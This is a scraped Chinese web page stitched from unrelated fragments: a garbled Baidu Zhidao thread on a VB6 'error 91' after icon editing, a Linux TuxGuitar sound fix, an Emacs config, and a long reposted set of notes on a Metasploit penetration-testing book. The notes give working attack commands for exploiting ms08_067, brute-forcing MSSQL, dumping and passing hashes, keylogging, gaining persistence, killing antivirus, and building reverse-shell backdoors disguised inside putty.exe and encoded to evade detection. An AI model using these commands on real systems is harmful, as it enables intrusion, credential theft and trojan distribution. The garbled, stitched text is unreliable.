VB我用reshacker下载修改了图标,然后就打开程序就提示run err 91

VB问题 程序刚刚启动时,提示err91, 重启然后正常,过一会提示下图,高手帮我看看_百度知道
VB问题 程序刚刚启动时,提示err91, 重启然后正常,过一会提示下图,高手帮我看看
\\pic\DJ_3. Then &#39.com/zhidao/wh%3D600%2C800/sign=178e6d366f/cbcdaeb780a4;若文件不存在fname = Trim(Y)Open Y For Output As #1&nbsp.ClearDo While Not EOF(1)Line Input #1.Navigate &<img class="ikqb_img" src="http.gif&quot.Path &amp.Close #1ElseOpen Y For Input As #1Combo1;一心以下Set Pic(4) = LoadPicture(App.Path &\pic\b_red_2.0提示如下图)Set Pic(9) = LoadPicture(App.)Picture3.gif&&\pic\b_notClass.gif&) &#39.AutoSize = TrueSet Pic(0) = LoadPicture(App.Navigate &quot://g;\pic\b_red_4.Enabled = TrueTimer1.jpg" esrc=" &quot.Path &amp.Path &\pic\b_red_1.txt& &If Dir(Y) = &\ &quot.Picture = LoadPicture(A" target="_blank"><a href="If Dir(j) = &) &#39;)Set Pic(8) = LoadPicture(App
我找到了解决办法了
添加一个启动界面
把跳出来的网站地址添加到hosts中就OK了
提问者采纳
误判,以后vb遇到这样的情况你就直接允许
我已经解决问题了 ,这个网站被我屏蔽就好了
提问者评价
其他类似问题
为您推荐:
其他1条回答
对象变量或 With块变量没有设置(错误 91)
提示出来的内容要你说吗。。。。
别看就是了。。。
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁信息安全 源自瑞星VB我用ResHacker修改了图标,然后就打开程序就提示run err 91_百度知道
VB我用ResHacker修改了图标,然后就打开程序就提示run err 91
这是怎么回事啊
怎么样可以解决
提问者采纳
程序执行时出错,所以错误了,无法继续了应该是你修改了程序图标后,无法识别,你改真彩之类的,VB最大只认32*32 256色的图标。可能是你修改的图标超过了VB的识别范围
有时好有时不好。。。
我已经解决了
不是图标问题
是我程序的问题
提问者评价
其他类似问题
为您推荐:
reshacker的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁小站会根据您的关注,为您发现更多,
看到喜欢的小站就马上关注吧!
下一站,你会遇见谁的梦想?
╔------------------------------------------------╗&┆&&&&&&&&&&&&&&渗透,破解,脱克,加密……&&&&&&&&&&&&&&┆&&&&&&我很菜,但我一直&坚持!独自等待……&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&╚------------------------------------------------╝&
linux下tuxguitar没声音的解决办法
& 软件可以正常打开可就是没声音,原因是因为没有安装Timidity++ MIDI sequencer.& 进终端输入:sudo apt-get install timidity timidity-interfaces-extra& 安装完成后到 工具-设置-声音 更换midi端口为timidity的端口就可以了。& 说个题外话,现在deepin做的确实不错,Deepin2014正式版最近也发布了,喜欢linux操作系统的朋友可以试试!
坑爹的windows坑爹的heroku云
rails是个好东西,可部署到heroku的云这么难,是heroku云坑爹还是windows下的rails,gem和git坑爹,还是咋回事,一天了都部署不成功,蛋疼不搞了!
win8下.我的emacs配置文件
win7&8下默认emacs的配置文件路径C:\Users\自己的账户名\AppData\RoamingAppData是个隐藏文件夹
(custom-set-variables
&;; custom-set-variables was added by Custom.
&;; If you edit it by hand, you could mess it up, so be careful.
&;; Your init file should contain only one such instance.
&;; If there is more than one, they won't work right.
&'(column-number-mode t)
&'(inhibit-startup-screen t))
(custom-set-faces
&;; custom-set-faces was added by Custom.
&;; If you edit it by hand, you could mess it up, so be careful.
&;; Your init file should contain only one such instance.
&;; If there is more than one, they won't work right.
(global-set-key [(meta down)] (lambda (&optional n) (interactive "p") (scroll-up (or n 1))))
(global-set-key [(meta up)] (lambda (&optional n) (interactive "p") (scroll-down (or n 1))))
(setq scroll-step 1 scroll-margin 3 scroll-conservatively 10000)
(setq column-number-mode t)
(global-linum-mode 1) ; always show line numbers(linum-mode t)
(show-paren-mode t)
(setq show-paren-style 'parentheses)
(display-time-mode 1)
(setq display-time-24hr-format t)
(setq display-time-day-and-date t)
(setq frame-title-format '("%S" (buffer-file-name "%f" (dired-directory dired-directory "%b"))))
(mouse-avoidance-mode 'animate)
(auto-image-file-mode)
(setq x-select-enable-clipboard t)
(fset 'yes-or-no-p 'y-or-n-p)
(setq c-syntactic-indentation t)
(setq c-tab-always-indent t)
;跳到某一行
(global-set-key [(control c) (control g)] 'goto-line)
(fset 'yes-or-no-p 'y-or-n-p)
如何让心爱的emacs左边显示行号,以及括号匹配呢
显示行号命令是:M-x&linum-mode效果,如图:
括号匹配(当你选中一个括号时候,选中及其对应的括号高亮)
命令是:M-x&show-paren-mode
效果,如图:
(M-x是alt+x)
《metasploit The PenetrationTester&#39;s Guide》读书笔记v2
《metasploit&The&PenetrationTester's&Guide》读书笔记v2
转自:http://www.t00ls.net/
----BY&chowner@t00ls
修订说明:v2版全面使用bt5&r1作为测试系统,对笔记中存在的众多错误和遗漏作了更正和补充;
一.名词解释&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&3
二.MSF基础&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&3
三.信息探测与收集&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&4
四.基本漏洞扫描&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&8
五.基础溢出命令&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&10
六.METERPRETER&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&11
七.避开杀软&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&15
八.使用用户端攻击方式(client-side&attacks)&&&&&&&&&&&&&&&&&&&&&&&17
九.MSF&附加模块&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&18
十.社会工程学工具集(SET)&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&20
十一.FAST-TRACK&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&22
十二.KARMERASPLOIT&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&23
十四.渗透实战演习&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&24
十五.常用命令备忘&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&26
一.名词解释
测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的
有内存溢出,网站程序漏洞利用,配置错误exploit。
我们想让被攻击系统执行的程序,如reverse&shell&可以从目标机器与测试者之间建立一
个反响连接,bind&shell&绑定一个执行命令的通道至测试者的机器。payload&也可以是只
能在目标机器上执行有限命令的程序。
是进行攻击时的一系列被当作payload&的指令,通常在目标机器上执行之后提供一个可
执行命令的shell。
MSF&的模块,由一系列代码组成。
等待来自被攻击机器的incoming&连接的监听在测试者机器上的程序。
二.MSF基础
1、MSF&提供多种用户界面:控制台模式(msfconsole),命令行模式(msfcli),图形模式(msfgui、
armitage),(在老版本中还有web&界面模式,后来貌似由于安全因素被取消了?)其中console
模式最常用,启动方式:
cd&/opt/framework/msf3/
msfconsole
运行此命令后将进入msf&命令提示符:
2、获取命令的帮助信息:help
help&connect
3、msfcli&和msfconsole&相比不提供交互方式,它直接从命令行输入所有参数并产生结果,
msfcli&&h&#获取帮助信息
msfcli&&exploit_name&&&option=value&&[mode]
------------------------------------------------------------------------------
mode:H(help)帮助
S(summary)显示模块信息
O(options)显示模块的可用选项
A(advanced)显示高级选项
I(ids)显示IDS&EVASION&选项
P(payload)显示此模块可用的payload
T(targets)显示可用targets
AC(action)显示可用actions
C(check)运行模块测试
E(execute)执行选定的模块
--------------------------------------------------------------------------------------
例子:ms08_067_netapi&模块
msfcli&windows/smb/ms08_067_netapi&O&#查看可用选项
msfcli&windows/smb/ms08_067_netapi&RHOST=192.168.0.111&P&#查看可用payload
msfcli&windows/smb/ms08_067_netapi&RHOST=192.168.0.111&PAYLOAD=windows/shell/bind_tcp&E
#执行(此处O、P&等参数也可以用小写)
4、Armitage&:MSF&的一个图形接口
运行方式:
cd&/opt/farmework/msf3/
5、MSF&其他组件:
MSFpayload&工具:
用于生成shellcode,可生成C,Ruby,JaveScript,VB&格式的shellcode。
帮助信息:
msfpayload&&h
MSFencode&工具:
编码压缩shellcode,过IDS&,防火墙。
msfencode&-h
msfencode&&l&查看可用的编码器(encoders),效果最佳的是x86/shikata_ga_nai
三.信息刺探与收集
1、攻击第一步:基础信息收集
①whois&查询:
msf&&&whois&
msf&&whois&192.168.1.100
②/在线收集服务器IP&信息工具
③nslookup
set&type=mx
2、用nmap&探测开放端口和服务:-sS&SYN&半开扫描-sT&TCP&半开扫描-Pn&不使用ping
方式探测主机-A&探测服务类型-6&开启IPV6&扫描-O&探测操作系统版本
--------------------------------------------------------------------------------------------------
常用扫描参数组合:
nmap&&sS&&Pn&192.168.0.111
nmap&&sS&&Pn&&A&192.168.0.111
其他组合:
nmap&-T4&-A&-v&深入式扫描
nmap&-sS&-sU&-T4&-A&-v&同上,且扫UDP
nmap&-p&1-65535&-T4&-A&-v&扫描所有TCP&端口
nmap&-T4&-A&-v&-Pn&不使用ping
nmap&-sn&使用ping
nmap&-T4&-F&快速扫描
nmap&-sV&-T4&-O&-F&--version-light&加强版快速扫描
nmap&-sn&--traceroute&快速路由跟踪扫描
nmap&-sS&-sU&-T4&-A&-v&-PE&-PP&-PS80,443&-PA3389&-PU40125&-PY&-g&53&--script&"default&or
(discovery&and&safe)"&慢速全面扫描
----------------------------------------------------------------------------------------------------------------
(&nmap&的scripts&位于/usr/local/share/nmap/scripts/&目录,&用LUA&语言编写,&nmap
--script-help&all&|&less&查看脚本扫描帮助信息)
(nmap&还有一个GUI&界面工具叫zenmap,命令zenmap&或nmapfe&都可以启动)
3、MSF&与postgresql&协同工作
/etc/init.d/postgreql-8.3&start
msf&&db_connect&postgres:toor@127.0.0.1/msf
msf&&db_status
导入nmap&扫描的结果:
nmap&&sS&&Pn&&A&&oX&Subnet1&192.168.1.0/24&#&-oX&扫描结果导出为Subnet1.xml
msf&&db_import&Subnet1.xml
msf&&db_hosts&&c&address&#查看导入的主机IP
(msf&也可以和mysql&一起工作,在bt5&r1&中msf&默认支持连接mysql:
msf&&db_driver&mysql
msf&&db_connect&root:toor@127.0.0.1/msf3&#连接本机mysql&的msf3&数据库
mysql&默认密码toor,使用db_connect&连接时会自动创建msf3&库)
4、高级扫描方式:
①msf&&use&auxiliary/scanner/ip/ipidseq&#IPID&序列扫描器,与nmap&的-sI&-O&选项类似
show&options
set&RHOSTS&192.168.1.0/24
set&RPORT&8080
set&THREADS&50
(RHOSTS、RPORT&等参数也可以用小写)
②msf&&nmap&&PN&&sI&192.168.1.09&192.168.1.155
③nmap&连接数据库:
msf&&db_connect&postgres:toor@127.0.0.1/msf
msf&&db_nmap&&sS&&A&192.168.1.111
msf&&db_services&#查看扫描结果
④使用portscan&模块:
msf&&search&postscan
msf&&use&scanner/postscan/syn
set&RHOSTS&192.168.1.111
set&THREADS&50
5、特定扫描:
smb_version&模块:
msf&&use&auxiliary/scanner/smb/smb_version
show&options
set&RHOSTS&192.168.1.111
db_hosts&&c&address,os_flavor
查找mssql&主机:
msf&&use&auxiliary/scanner/mssql/mssql_ping
show&options
set&RHOSTS&192.168.1.0/24
set&THREADS&255
SSH&服务器扫描:
msf&&use&auxiliary/scanner/ssh/ssh_version
set&THREADS&50
FTP&主机扫描:
msf&&use&auxiliary/scanner/ftp/ftp_version
show&options
set&RHOSTS&192.168.1.0/24
set&THREADS&255
扫描FTP&匿名登录:
use&auxiliary/scanner/ftp/anonymos
set&RHOSTS&192.168.1.0/24
set&THREADS&50
扫描SNMP&主机:
msf&&use&auxiliary/scanner/snmp/snmp_login
set&RHOSTS&192.168.1.0/24
set&THREADS&50
6、编写自定义扫描模块:
MSF&框架提供对其所有exploit&和method&的访问,支持代理,SSL,报告生成,线程,
使用Ruby&语言。
例子:一个简单的自定义扫描模块
----------------------------------------------------------------------------------------------------------------
#Metasploit
require&&msf/core&
class&Metasploit3&&&Msf::Auxiliary
include&Msf::Exploit::Remote::Tcp
include&Msf:Auxiliary::Scanner
def&initialize
&Name&&=&&&My&custom&TCP&scan&,
&Version&&=&&&$Revision:&1$&,
&Description&&=&&&My&quick&scanner&,
&Author&&=&&&Your&name&here&,
&License&&=&&&MSF_LICENSE&
register_options(
Opt::RPORT(12345)
],self.class)
def&run_host(ip)
sock.puts(&HELLO&SERVER&)
data&=&sock.recv(1024)
print_status(&Received:&#{data}&from&#{ip}&)
disconnect()
-------------------------------------------------------------------------------------------------------------
测试:将模块保存到modules/auxiliary/scanner/目录下面,命名为simple_tcp.rb,注意
保存的位置很重要。
使用nc&监听一个端口测试这个模块:
echo&&Hello&Metasploit&&&&banner.txt
nc&&lvnp&12345&&&banner.txt
msf&&use&auxiliary/scanner/simple_tcp
&show&options
&set&RHOSTS&192.168.1.111
Received:&Hello&Metasploit&from&192.168.1.111
四.基本漏洞扫描
1、使用nc&与目标端口通信,获取目标端口的信息:
nc&192.168.1.111&80
GET&HTTP&1/1
Server:&Microsoft-IIS/5.1
(1:还有一个功能与nc&类似的工具Ncat,产自nmap&社区,可实现相同功能:
ncat&-C&192.168.1.111&80
GET&/&HTTP/1.0
2:题外:ncat&还可以做聊天服务器呢!在服务器端监听然后多个客户端直接连上就
可以聊天了:服务器(chatserver):ncatncat&-l&--chat&其他客户端:ncat&chatserver
3:ncat&还可以用来查看各种客户端的请求信息,比如论坛里有人问中国菜刀有木有
后门,那么可以这样查看中国菜刀连接后门时发送的数据:
服务器()上:ncat&-l&--keep-open&80&--output&caidao.log&&&/dev/null
然后使用菜刀连接/nc.php&并请求操作,这是菜刀发送的数据
就保存到服务器的caidao.log&里面了。也可以导出为hex&格式,--output&换为--hex-dump
就可以了。
4:其实与nc&功能类似的工具在bt5&里面还有很多,比如还有一个sbd:
监听:sbd&-l&-p&12345
连接:sbd&192.168.1.111&12345
5:当然也可以用来聊天,与ncat&的不同之处在于ncat&自动对用户编号user1、user2、...,
而sbd&可以自定义昵称,且不需要专门单独监听为聊天服务器:
pc1:sbd&-l&-p&12345&-P&chowner
pc2:sbd&pc1&12345&-P&evil
6:其实nc&也可以用来聊天的:
pc1:nc&-l&-p&12345
pc2:telnet&pc1&12345)
2、与NeXpose&结合扫描:
在nexpose&中扫描目标并生成xml&格式的报告后,将报告导入到msf:
db_connect&postgres:toor@127.0.0.1/msf
db_import&/tmp/host_test.xml
db_hosts&&c&address,svvs,vulns
在MSF&中运行nexpose:
db_destroy&postgres:toor@127.0.0.l1/msf
db_connect&postgres:toor@127.0.0.1/msf
load&nexpose
nexpose_connect&&h
nexpose_connect&nexpose:toor@192.168.1.111&ok
nexpose_scan&192.168.1.195
db_hosts&&c&address
(如果你想在bt5&里安装nexpose&的话建议把bt5&硬盘空间多留几十G,这玩意硬盘小
了不让装。)
3、与nessus&结合扫描:
使用Nessus&扫描完成后生成.nessus&格式的报告,导入到MSF:
db_connect&postgres:toor@127.0.0.1/msf
db_import&/tmp/nessus_report_Host_test.nessus
db_hosts&&c&address,svcs,vulns
在MSF&中使用Nessus:
db_connect&postgres:toor@127.0.0.1/msf
load&nessus
nessus_connect&nessus:toor@192.168.1.111:8834&ok
nessus_policy_list&#查看存在的扫描规则
nessus_scan_new&2&bridge_scan&192.168.1.111&#2&表示规则的ID&号,bridge_scan&自定义扫
nessus_scan_status&#查看扫描进行状态
nessus_report_list&#查看扫描结果
nessus_report_get&skjla243-3b5d-*******&#导入报告
db_hosts&&c&address,svcs,vulns
4、特殊扫描:
SMB&弱口令:
msf&&use&auxiliary/scanner/smb/smb_login
set&RHOSTS&192.168.1.111-222
set&SMBUser&Administrator
set&SMBPass&admin
VNC&空口令:
msf&&use&auxiliary/scanner/vnc/vnc_none_auth
set&RHOSTS&192.168.1.111
Open&X11&空口令:
msf&&use&auxiliary/scanner/x11/open_x11
set&RHOST&192.168.1.0/24
set&THREADS&50
当扫描到此漏洞的主机后可以使用xspy&工具来监视对方的键盘输入:
cd&/pentest/sniffers/xspy/
./xspy&&display&192.168.1.125:0&&delay&100
(xspy&这货在bt5&r1&里面貌似木有了)
5、使用Autopwn&处理扫描结果:
autopwn&选项:e&执行attack&t&查看匹配模块r&使用reverse&shell&作为payload&x
基于漏洞筛选模块p&基于端口筛选模块
db_connect&postgres:toor@127.0.0.1/msf
db_import&/root/nessus.nbe
db_autopwn&&e&&t&&r&&x&&p
-e&针对符合条件的目标加载所有exploit&-t&显示所有匹配的exploit&-r&使用反弹shell
-x&基于漏洞筛选模块-p&基于端口筛选模块
五.基础溢出命令
1、基本命令:
查看可用溢出模块show&exploits
查看辅助模块show&auxiliary&包括扫描器,拒绝服务模块,fuzzer&工具或其他。
查看可用选项show&options
加载模块后退出此模块back
msf&&use&windows/smb/ms08_067_netapi
搜索模块search
例子:&searh&mssql&search&ms08_067
查看当前模块可用的payload:&show&payloads
use&windows/smb/ms08_067_netapi
show&payloads
set&payload&windows/shell/reverse_tcp
show&options
查看可选的目标类型show&targets
查看更多信息info
设置一个选项或取消设置set/unset
设置或取消全局选项setg/unsetg&例如设置LHOST&就可以用setg,避免后面重复设置
保存全局选项的设置save&当下次启动仍然生效
查看建立的session&sessions&&l
激活session&sessions&&i&num&#num&为session&编号
2、暴力端口探测:
当主机端口对外开放但是普通探测方法无法探测到时,用此模块,msf&将对目标的所有
端口进行尝试,直到找到一个开放端口并与测试者建立连接。
use&exploit/windows/smb/ms08_067_netapi
set&LHOST&192.168.1.111
set&RHOST&192.168.1.122
set&TARGET&39&#Windows&XP&SP3&Chinese&-&Simplified&(NX)
search&ports&#搜索与ports&相关模块
set&PAYLOAD&windows/meterpreter/reverse_tcp_allports
exploit&&j&#作为后台任务运行
sessions&&l&&v
sesssions&&i&1
3、MSF&脚本文件:
为了缩短测试时间可以将msf&命令写入一个文件,然后在msf&中加载它。
加载方式:msfconsole&的resource&命令或者msfconsole&加上-r&选项
echo&&version&&&&resource.rc
echo&&load&sounds&&&&&resource.rc
msfconsole&&r&resource.rc
echo&&use&exploit/windows/smb/ms08_067_netapi&&&&autoexp.rc
echo&&set&RHOST&192.168.1.133&&&&&autoexp.rc
echo&&set&PAYLOAD&windows/meterpreter/reverse_tcp&&&&&autoexp.rc
echo&&set&LHOST&192.168.1.111&&&&&autoexp.rc
echo&&exploit&&&&&autoexp.rc
msfconsole
msf&&resource&autoexp.rc
六.METERPRETER
1、当对目标系统进行溢出时,使用meterpreter&作为payload,给测试者返回一个shell,可
用于在目标机器上执行更多的操作。
msf&&nmap&&sT&&A&&P0&192.168.1.130&#探测开放服务
假如已经探测到1433(TCP)和1434(UDP)端口(mssql),
msf&&nmap&&sU&192.168.1.130&&P&1434&#确认端口开放
msf&&use&auxiliary/scanner/mssql/mssql_ping
show&options
set&RHOSTS&192.168.1.1/24
set&THREADS&20
至此可获取服务器名称,版本号等信息。
msf&&use&auxiliary/scanner/mssql/mssql_login
show&options
set&PASS_FILE&/pentest/exploits/fasttrack/bin/dict/wordlist.txt
set&RHOSTS&192.168.1.130
set&THREADS&10
set&verbose&false
暴力猜解登陆密码。接下来使用mssql&自带的xp_cmdshell&功能添加账户:
msf&&use&exploit/windows/mssql/mssql_payload
show&options
set&payload&windows/meterpreter/reverse_tcp
set&LHOST&192.168.1.111
set&LPORT&433
set&RHOST&192.168.1.130
set&PASSWORD&password130
当获取到一个meterpreter&shell&后可以执行更多的操作:
获取屏幕截图:screenshot
获取系统信息:sysinfo
获取键盘记录:
meterpreter&&ps&#查看目标机器进程,假设发现explorer.exe&的进程号为1668:
meterpreter&&migrate&1668&#插入该进程
meterpreter&&run&post/windows/capture/keylog_recorder&#运行键盘记录模块,将击键记
录保存到本地txt
cat&/root/.msf3/loot/*****.txt&#查看结果
获取系统账号密码:
meterpreter&&use&priv
meterpreter&&run&post/windows/gather/hashdump
当获取到密码的hash&之后无法破解出明文密码且无法直接使用hash&登陆,需要使用
pass-the-hash&技术:
msf&&use&windows/smb/psexec
set&PAYLOAD&windows/meterpreter/reverse_tcp
set&LHOST&192.168.1.111
set&LPORT&443
set&RHOST&192.168.1.130
set&SMBPass&aad3b435b51404eeaad3b435b51404ee:be04afac36c29
获取到系统权限后我们可以新建一个普通账号,然后使用此账号执行我们的后门:
在目标机器上执行:net&uaer&hacker&pass&/add
本地生成一个后门程序:
msfpayload&windows/meterpreter/reverse_tcp
LHOST=192.168.1.111&LPORT=443&X&&payload.exe
将payload.exe&拷贝到目标机器然后使用新建立的账号执行
本地执行端口监听,等待来自目标机器连接:
msfcli&multi/handler&PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=192.168.1.111&LPORT=443
至此取得SYSTEM&权限
2、令牌模拟:当有域控账户登陆至服务器时可使用令牌模拟进行渗透取得域控权限,之后
登陆其他机器时不需要登陆密码。
meterpreter&&ps&#&查看目标机器进程,找出域控账户运行的进程ID,假如发现PID&为
meterpreter&&steal_token&380
有时ps&命令列出的进程中可能不存在域控账户的进程,此时使用incognito&模块查看可
meterpreter&&use&incognito
meterpreter&&list_tokens&&u&#列出可用token,假如找到域控token
meterpreter&&impersonate_token&SNEAKS.IN\\ihazdomainadmin
meterpreter&&add_user&hacker&password&&h&192.168.1.50&#在域控主机上添加账户
meterpreter&&add_group_user&&Domain&Admins&&hacker&&h&192.168.1.50&#将账户添加至
域管理员组
3、内网渗透:当取得同网段内一台主机的权限后可以进一步渗透网内其他主机:
meterpreter&&run&get_local_subnets&#查看网段/子网
Local&subnet:&192.168.33.0/255.255.255.0
meterpreter&&background&#转入后台运行
msf&&route&add&192.168.33.0&255.255.255.0&1&#本地添加路由信息
msf&&route&print&#查看添加的信息
msf&&use&linux/samba/lsa_transnames_heap&#准备向内网目标主机进攻
set&payload&linux/x86/shell/reverse_tcp
set&LHOST&10.10.1.129&#此处为attacking&主机的外网IP
set&LPORT&8080
set&RHOST&192.168.33.132&#内网目标主机
也可以使用自动式添加路由模块:
msf&&load&auto_add_route
msf&&exploit
4、Meterpreter&脚本:
使用run&scriptname&方式执行
①vnc&脚本,获取远程机器vnc&界面控制
meterpreter&&run&vnc
meterpreter&&run&screen_unlock
②进程迁移
当攻击成功后将连接进程从不稳定进程(如使用浏览器溢出漏洞exp&进行攻击时浏览器
可能会被目标关闭)迁移至稳定进程(explorer.exe),保持可连接。
meterpreter&&run&post/windows/manage/migrate
(在64&位win7&中migrate&需要管理员权限执行后门才能成功,而migrate&前后获取的
权限是有差异的。)
③关闭杀毒软件
meterpreter&&run&killav&(这个脚本要小心使用,可能导致目标机器蓝屏死机。)
④获取系统密码hash
meterpreter&&run&hashdump
(64&位win7&下需要管理员权限执行后门且先getsystem,然后使用
run&post/windows/gather/hashdump&来dump&hash&成功率更高。
而且如果要使用shell&添加系统账户的话win7&下得先:
run&post/windows/escalate/bypassuac&,不然可能不会成功。)
⑤获取系统流量数据
meterpreter&&run&packtrecorder&&i&1
⑥直捣黄龙
可以干很多事情:获取密码,下载注册表,获取系统信息等
meterpreter&&run&scraper
⑦持久保持
当目标机器重启之后仍然可以控制
meterpreter&&run&persistence&&X&&i&50&&p&443&&r&192.168.1.111
-X&开机启动-i&连接超时时间&p&端口&rIP
下次连接时:
msf&&use&multi/handler
set&payload&windows/meterpreter/reverse_tcp
set&LPOST&443
set&LHOST&192.168.1.111
(会在以下位置和注册表以随机文件名写入文件等信息,如:
C:\Users\YourtUserName\AppData\Local\Temp\MXIxVNCy.vbs
C:\Users\YourtUserName\AppData\Local\Temp\radF871B.tmp\svchost.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DjMzwzCDaoIcgNP)
⑧POST&整合模块
可实现同时多个session&操作
例子:获取hash
meterpreter&&run&post/windows/gather/hashdump
其他还有很多,使用TAB&键补全看下就知道run&post/&TAB&
5、升级command&shell
msfconsole
msf&&search&ms08_067
msf&&use&windows/smb/ms08_067_netapi
set&PAYLOAD&windows/shell/reverse_tcp
set&TARGET&3
setg&LHOST&192.168.1.111
setg&LPORT&8080
exploit&&z&#后台运行,如果此处未使用-z&参数,后面可以按CTRL-Z&转到后台
sessions&&u&1&#升级shell,必须前面使用setg&设定
sessions&&i&2
6、使用Railgun&操作windows&APIs
meterpreter&&irb
&&client.railgun.user32.MessageBoxA(o,&hello&,&world&,&MB_OK&)
在目标机器上会弹出一个标题栏为world&和内容为hello&的窗口
七.避开杀软
1、使用msfpayload&创建可执行后门:
msfpayload&windows/shell_reverse_tcp&0&#查看选项
msfpayload&windows/shell_reverse_tcp&LHOST=192.168.1.111&LPORT=31337&X&&
/var/www/payload1.exe
然后本机监听端口
msf&&use&exploit/multi/handler
show&options
set&PAYLOAD&windows/shell_reverse_tcp
set&LHOST&192.168.1.111
set&LPORT&31337
2、过杀软---使用msfencode&编码后门:
msfencode&&l&#列出可用编码器
msfpayload&windows/shell_reverse_tcp&LHOST=192.168.1.111&LPORT=31337&R
|msfencode&&e&x86/shikata_ga_nai&&t&exe&&&/var/www/payload2.exe
使用R&参数作为raw&输出至管道,再经过msfencode&处理,最后导出。
3、多次编码:
msfpayload&windows/meterpreter/reverse_tcp&LHOST=192.168.1.111&LPORT=31337&R&|
msfencode&&e&x86/shikata_ga_nai&&c&5&&t&raw&|&msfencode&&e&x86/alpha_upper&&c&2&&t&raw&|
msfencode&&e&x86/shikata_ga_nai&&c&5&&t&raw&|&msfencode&&e&x86/countdown&&c&5&&t&exe&&o
/var/www/payload3.exe
简单编码被杀机会很大,使用多次编码效果更好,这里一共使用了17&次循环编码。
(题外:经测试,1:使用此命令生成的后门也被MSE&杀到;2:未编码的后门或编码
次数较少的后门可以直接被秒杀;3:windows/x64/meterpreter/reverse_tcp&生成的后门未
经任何处理仍然不被杀,看来杀毒软件傻逼了;4:x86&编码器编码的后门在64&位机器
上无法执行;5:360&有个沙箱功能,后门文件右键选择&在360&隔离沙箱中运行&,msf
照样可以连接并操作,看来隔离沙箱功能有限。)
4、自定义可执行程序模板:
msfencode&默认使用data/templates/templates.exe(msf&v4&在templates&目录下有针对不同
平台的不同模板)作为可执行程序的模板,杀毒厂商也不是傻逼,所以这里最好使用自
定义模板,如:
wget&/Files/ProcessExplorer.zip
unzip&ProcessExplorer.zip
msfpayload&windows/shell_reverse_tcp&LHOST=192.168.1.111&LPORT=8080&R&|&msfencode
&t&exe&&x&work/procexp.exe&&o&/var/www/pe_backdoor.exe&&e&x86/shikata_ga_nai&&c&5
在目标机器上运行,然后本地使用msfcli&监听端口等待反弹连接:
msfcli&exploit/multi/handler&PAYLOAD=windows/shell_reverse_tcp&LHOST=192.168.1.111
LPORT=8080&E
5、暗度陈仓&猥琐执行payload:
绑定payload&至一个可执行文件,让目标不知不觉间中招,以putty.exe&为例:
msfpayload&windows/shell_reverse_tcp&LHOST=192.168.1.111&LPORT=8080&R&|&msfencode
&t&exe&&x&putty.exe&-o&/var/www/putty_backdoor.exe&&e&x86/shikata_ga_nai&&k&&c&5
假如选择一个GUI&界面的程序作为绑定目标并且不使用-k&选项,则目标执行此程序的
时候不会弹出cmd&窗口,-k&选项的作用是payload&独立于模板软件的进程运行。
msfencode&部分编码器会增加程序体积,这时可使用壳(packer)来压缩程序,&带套之
后更保险&,例如UPX&:
apt-get&install&upx
最新版可到sf.net&下载
使用方法:
upx&-5&/var/www/payload3.exe
还有另外一个工具msfvenom&结合了msfpayload&和msfencode&的功能,使用起来更省心,
亲,一定要试试哦!过杀软总结起来就是多次编码和使用多种壳,终极大法就是使用自
己编写的后门(市面上没有,被杀几率更低)。
八.使用用户端攻击方式(client-side&attacks)
1、主要指利用多种途径包括社会工程学方式攻击目标机器上安装的带有漏洞的程序如浏览
器,pdf&阅读器,office&软件等,最终获取系统权限。
基于浏览器的攻击:
msf&&use&windows/browser/ms10_002_aurora
set&payload&windows/meterpreter/reverse_tcp
set&SRVPORT&80
set&URIPATH&/
set&LHOST&192.168.1.111
set&LPORT&443
exploit&&z
sessions&&i&1
run&migrate
msf&&use&windows/browser/ms10_002_aurora
show&advanced
set&ReverseConnectRetries&10
set&AutoRunScript&migrate&&f
2、文件格式exploit
利用文件格式的漏洞达到溢出的目的,比如PDF,word,图片等。
msf&&use&windows/fileformat/ms11_006_createsizeddibsection
set&payload&windows/meterpreter/reverse_tcp
set&LHOST&192.168.1.111
set&LPORT&443
此时会生成一个msf.doc&的word&文档,在目标机器上打开此文档,然后本机监听端口
等待反弹连接:
use&multi/handler
set&payload&windows/meterpreter/reverse_tcp
set&LHOST&192.168.1.111
set&LPORT&443
exploit&&j
九.MSF&附加模块
包括端口扫描,服务探测,弱口令探测,fuzzer,sql&注射等。附加模块没有payload。
模块保存在/opt/framework3/msf3/modules/auxiliary/目录中的各个子目录下。
可用命令查看全部可用附加模块:msf&&show&auxiliary
msf&&use&scanner/http/webdav_scanner
show&options
set&RHOSTS&192.168.1.141,192.168.1.142,192.168.2.222
搜索所有http&相关扫描模块:
search&scanner/http
附加模块深层剖析:
cd&/opt/framework3/msf3/modules/auxiliary/admin/
http://carnal0wnage.googlecode.c&...&admin/random/foursq
require&&msf/core&
class&Metasploit3&&&Msf::Auxiliary&#导入Auxiliaary&类
#Exploit&mixins&should&be&called&first
include&Msf::Exploit::Remote::HttpClient&#导入HTTPClient&方法
include&Msf::Auxiliary::Report
